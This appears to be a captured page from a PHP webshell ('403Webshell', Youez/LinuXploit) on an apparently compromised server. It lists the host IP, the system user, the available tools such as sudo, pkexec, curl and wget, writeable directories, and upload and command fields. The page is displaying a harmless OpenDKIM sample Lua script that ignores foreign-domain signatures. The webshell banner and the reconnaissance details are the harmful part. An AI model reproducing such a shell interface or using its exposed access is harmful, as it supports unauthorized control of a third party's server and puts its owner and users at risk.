403Webshell
Server IP : 195.114.193.97  /  Your IP : 216.73.217.93
Web Server : LiteSpeed
System : Linux host 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
User : sembi4241 ( 1126)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/opendkim/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/opendkim/examples/screen.lua.sample
--
--  Copyright (c) 2009, 2010, 2012, The Trusted Domain Project.
--    All rights reserved.
--
--  screen.lua.sample -- sample version of the "screen" script that demonstrates
--                       all of the features of the configuration file
--
--  The screen script is executed after all header fields have been received
--  and after signatures have been selected, but before the message body
--  is handled.  Here we have an opportunity to identify and ignore signatures
--  we know we don't trust.

--  retrieve the count of signatures on the message
nsigs = odkim.get_sigcount(ctx)
if nsigs == nil then
	return nil
end

--  get the From: domain
fdomain = odkim.get_fromdomain(ctx)
if fdomain == nil then
	return nil
end

--  for each signature, ignore it if it's not from the sender's domain
for n = 1, nsigs do
	sig = odkim.get_signhandle(ctx, n)
	sdomain = odkim.sig_getdomain(sig)
	if fdomain ~= sdomain then
		odkim.sig_ignore(sig)
	end
end

--  That's it!
return nil

Youez - 2016 - github.com/yon3zu
LinuXploit